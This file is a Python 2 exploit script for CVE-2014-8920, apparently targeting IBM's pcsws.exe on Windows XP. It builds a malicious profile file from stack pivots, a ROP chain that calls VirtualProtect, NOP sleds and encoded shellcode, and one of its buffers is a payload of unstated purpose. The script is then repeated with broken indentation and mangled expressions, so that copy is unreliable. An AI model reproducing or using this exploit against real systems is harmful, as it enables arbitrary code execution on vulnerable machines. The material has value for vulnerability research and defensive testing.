emyei/CVE-2014-8920.py

## CVE-2014-8920.py
import struct

# Reported by Fernando Muñoz
# Upstream: http://www-01.ibm.com/support/docview.wss?uid=nas8N1020518
# Author: Marcelo Echeverria
# Tested on Windows XP SP3


stack_pivot1 = 0x67bc6661
stack_pivot2 = 0x67bc1967

# Salta 3 veces: pivot1 + pivot2 + pivot1

# Shellcode w32-calc google
buf = "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7"

buf =  ""
buf += "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xa0\xa9\x85\xb6\x83\xee\xfc\xe2\xf4\x5c\x41"
buf += "\x07\xb6\xa0\xa9\xe5\x3f\x45\x98\x45\xd2\x2b\xf9\xb5"
buf += "\x3d\xf2\xa5\x0e\xe4\xb4\x22\xf7\x9e\xaf\x1e\xcf\x90"
buf += "\x91\x56\x29\x8a\xc1\xd5\x87\x9a\x80\x68\x4a\xbb\xa1"
buf += "\x6e\x67\x44\xf2\xfe\x0e\xe4\xb0\x22\xcf\x8a\x2b\xe5"
buf += "\x94\xce\x43\xe1\x84\x67\xf1\x22\xdc\x96\xa1\x7a\x0e"
buf += "\xff\xb8\x4a\xbf\xff\x2b\x9d\x0e\xb7\x76\x98\x7a\x1a"
buf += "\x61\x66\x88\xb7\x67\x91\x65\xc3\x56\xaa\xf8\x4e\x9b"
buf += "\xd4\xa1\xc3\x44\xf1\x0e\xee\x84\xa8\x56\xd0\x2b\xa5"
buf += "\xce\x3d\xf8\xb5\x84\x65\x2b\xad\x0e\xb7\x70\x20\xc1"
buf += "\x92\x84\xf2\xde\xd7\xf9\xf3\xd4\x49\x40\xf6\xda\xec"
buf += "\x2b\xbb\x6e\x3b\xfd\xc1\xb6\x84\xa0\xa9\xed\xc1\xd3"
buf += "\x9b\xda\xe2\xc8\xe5\xf2\x90\xa7\x56\x50\x0e\x30\xa8"
buf += "\x85\xb6\x89\x6d\xd1\xe6\xc8\x80\x05\xdd\xa0\x56\x50"
buf += "\xe6\xf0\xf9\xd5\xf6\xf0\xe9\xd5\xde\x4a\xa6\x5a\x56"
buf += "\x5f\x7c\x12\xdc\xa5\xc1\x45\x1e\xaa\x3d\xed\xb4\xa0"
buf += "\xb8\xd9\x3f\x46\xc3\x95\xe0\xf7\xc1\x1c\x13\xd4\xc8"
buf += "\x7a\x63\x25\x69\xf1\xba\x5f\xe7\x8d\xc3\x4c\xc1\x75"
buf += "\x03\x02\xff\x7a\x63\xc8\xca\xe8\xd2\xa0\x20\x66\xe1"
buf += "\xf7\xfe\xb4\x40\xca\xbb\xdc\xe0\x42\x54\xe3\x71\xe4"
buf += "\x8d\xb9\xb7\xa1\x24\xc1\x92\xb0\x6f\x85\xf2\xf4\xf9"
buf += "\xd3\xe0\xf6\xef\xd3\xf8\xf6\xff\xd6\xe0\xc8\xd0\x49"
buf += "\x89\x26\x56\x50\x3f\x40\xe7\xd3\xf0\x5f\x99\xed\xbe"
buf += "\x27\xb4\xe5\x49\x75\x12\x75\x03\x02\xff\xed\x10\x35"
buf += "\x14\x18\x49\x75\x95\x83\xca\xaa\x29\x7e\x56\xd5\xac"
buf += "\x3e\xf1\xb3\xdb\xea\xdc\xa0\xfa\x7a\x63"


def create_rop_chain():

    rop_gadgets = [
      0x0041c76d,  # POP EAX # RETN [pcsws.exe]
	  0x004C11B4,  # EAX (IAT OFFSET WaitForMultipleObjects)
      0x67b95848,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [LTASWN20.DLL]
	  0x67b9b002,  # POP ESI # RETN
	  0x0000013f,  # IAT DEREFERENCING VirtualProtect
	  0x66fc4dfb,  # ADD EAX,ESI # POP ESI # POP EBP # RETN
      0x41414141,  # ESI PAD
      0x41414141,  # EBP PAD
      0x66eece8c,  # XCHG EAX,ESI # RETN [PCSTLNET.dll]
      0x004b5817,  # POP EBP # RETN [pcsws.exe]
      0x67392433,  # & call esp [PCSHELP.dll]
      0x67bd8003,  # POP EBX # RETN [LTASWN20.DLL]
      0x00000201,  # 0x00000201-> ebx
      0x00489a33,  # POP EDX # DEC ESI # ADD AL,CH # RETN [pcsws.exe]
      0x00000040,  # 0x00000040-> edx
      0x67963018,  # POP ECX # RETN [PCSSH.dll]
      0x66d2651d,  # &Writable location [PCSWSAPI.dll]
      0x66eecfb9,  # POP EDI # RETN [PCSTLNET.dll]
      0x66e79118,  # RETN (ROP NOP) [PCSULIB.dll]
      0x0041c76d,  # POP EAX # RETN [pcsws.exe]
      0x90909090,  # nop
      0x67bb99b2,  # PUSHAD # RETN [LTASWN20.DLL]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

adjust_stack = "\x81\xc4\x00\x40\x00\x00\x89\xe5\x81\xc5\x00\x40\x00\x00\x66\x83\xe4\xf8\x66\x83\xe5\xf8"

print "[Profile]"
print "ID=WS"
print "Version=1"
print "["+struct.pack('<I',stack_pivot2)+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+struct.pack('<I',stack_pivot1)+"]"
print "a=1"
print "["+"M"*35+rop_chain+"\x90"*8+adjust_stack+"\x90"*2+buf+"\x90"*10
print "a=1"
	import struct

	# Reported by Fernando Muñoz
	# Upstream: http://www-01.ibm.com/support/docview.wss?uid=nas8N1020518
	# Author: Marcelo Echeverria
	# Tested on Windows XP SP3


	stack_pivot1 = 0x67bc6661
	stack_pivot2 = 0x67bc1967

	# Salta 3 veces: pivot1 + pivot2 + pivot1

	# Shellcode w32-calc google
	buf = "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7"

	buf = ""
	buf += "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
	buf += "\x76\x0e\xa0\xa9\x85\xb6\x83\xee\xfc\xe2\xf4\x5c\x41"
	buf += "\x07\xb6\xa0\xa9\xe5\x3f\x45\x98\x45\xd2\x2b\xf9\xb5"
	buf += "\x3d\xf2\xa5\x0e\xe4\xb4\x22\xf7\x9e\xaf\x1e\xcf\x90"
	buf += "\x91\x56\x29\x8a\xc1\xd5\x87\x9a\x80\x68\x4a\xbb\xa1"
	buf += "\x6e\x67\x44\xf2\xfe\x0e\xe4\xb0\x22\xcf\x8a\x2b\xe5"
	buf += "\x94\xce\x43\xe1\x84\x67\xf1\x22\xdc\x96\xa1\x7a\x0e"
	buf += "\xff\xb8\x4a\xbf\xff\x2b\x9d\x0e\xb7\x76\x98\x7a\x1a"
	buf += "\x61\x66\x88\xb7\x67\x91\x65\xc3\x56\xaa\xf8\x4e\x9b"
	buf += "\xd4\xa1\xc3\x44\xf1\x0e\xee\x84\xa8\x56\xd0\x2b\xa5"
	buf += "\xce\x3d\xf8\xb5\x84\x65\x2b\xad\x0e\xb7\x70\x20\xc1"
	buf += "\x92\x84\xf2\xde\xd7\xf9\xf3\xd4\x49\x40\xf6\xda\xec"
	buf += "\x2b\xbb\x6e\x3b\xfd\xc1\xb6\x84\xa0\xa9\xed\xc1\xd3"
	buf += "\x9b\xda\xe2\xc8\xe5\xf2\x90\xa7\x56\x50\x0e\x30\xa8"
	buf += "\x85\xb6\x89\x6d\xd1\xe6\xc8\x80\x05\xdd\xa0\x56\x50"
	buf += "\xe6\xf0\xf9\xd5\xf6\xf0\xe9\xd5\xde\x4a\xa6\x5a\x56"
	buf += "\x5f\x7c\x12\xdc\xa5\xc1\x45\x1e\xaa\x3d\xed\xb4\xa0"
	buf += "\xb8\xd9\x3f\x46\xc3\x95\xe0\xf7\xc1\x1c\x13\xd4\xc8"
	buf += "\x7a\x63\x25\x69\xf1\xba\x5f\xe7\x8d\xc3\x4c\xc1\x75"
	buf += "\x03\x02\xff\x7a\x63\xc8\xca\xe8\xd2\xa0\x20\x66\xe1"
	buf += "\xf7\xfe\xb4\x40\xca\xbb\xdc\xe0\x42\x54\xe3\x71\xe4"
	buf += "\x8d\xb9\xb7\xa1\x24\xc1\x92\xb0\x6f\x85\xf2\xf4\xf9"
	buf += "\xd3\xe0\xf6\xef\xd3\xf8\xf6\xff\xd6\xe0\xc8\xd0\x49"
	buf += "\x89\x26\x56\x50\x3f\x40\xe7\xd3\xf0\x5f\x99\xed\xbe"
	buf += "\x27\xb4\xe5\x49\x75\x12\x75\x03\x02\xff\xed\x10\x35"
	buf += "\x14\x18\x49\x75\x95\x83\xca\xaa\x29\x7e\x56\xd5\xac"
	buf += "\x3e\xf1\xb3\xdb\xea\xdc\xa0\xfa\x7a\x63"









	def create_rop_chain():

	rop_gadgets = [
	0x0041c76d, # POP EAX # RETN [pcsws.exe]
	0x004C11B4, # EAX (IAT OFFSET WaitForMultipleObjects)
	0x67b95848, # MOV EAX,DWORD PTR DS:[EAX] # RETN [LTASWN20.DLL]
	0x67b9b002, # POP ESI # RETN
	0x0000013f, # IAT DEREFERENCING VirtualProtect
	0x66fc4dfb, # ADD EAX,ESI # POP ESI # POP EBP # RETN
	0x41414141, # ESI PAD
	0x41414141, # EBP PAD
	0x66eece8c, # XCHG EAX,ESI # RETN [PCSTLNET.dll]
	0x004b5817, # POP EBP # RETN [pcsws.exe]
	0x67392433, # & call esp [PCSHELP.dll]
	0x67bd8003, # POP EBX # RETN [LTASWN20.DLL]
	0x00000201, # 0x00000201-> ebx
	0x00489a33, # POP EDX # DEC ESI # ADD AL,CH # RETN [pcsws.exe]
	0x00000040, # 0x00000040-> edx
	0x67963018, # POP ECX # RETN [PCSSH.dll]
	0x66d2651d, # &Writable location [PCSWSAPI.dll]
	0x66eecfb9, # POP EDI # RETN [PCSTLNET.dll]
	0x66e79118, # RETN (ROP NOP) [PCSULIB.dll]
	0x0041c76d, # POP EAX # RETN [pcsws.exe]
	0x90909090, # nop
	0x67bb99b2, # PUSHAD # RETN [LTASWN20.DLL]
	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

	rop_chain = create_rop_chain()

	adjust_stack = "\x81\xc4\x00\x40\x00\x00\x89\xe5\x81\xc5\x00\x40\x00\x00\x66\x83\xe4\xf8\x66\x83\xe5\xf8"

	print "[Profile]"
	print "ID=WS"
	print "Version=1"
	print "["+struct.pack('<I',stack_pivot2)+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+struct.pack('<I',stack_pivot1)+"]"
	print "a=1"
	print "["+"M"35+rop_chain+"\x90"8+adjust_stack+"\x90"2+buf+"\x90"10
	print "a=1"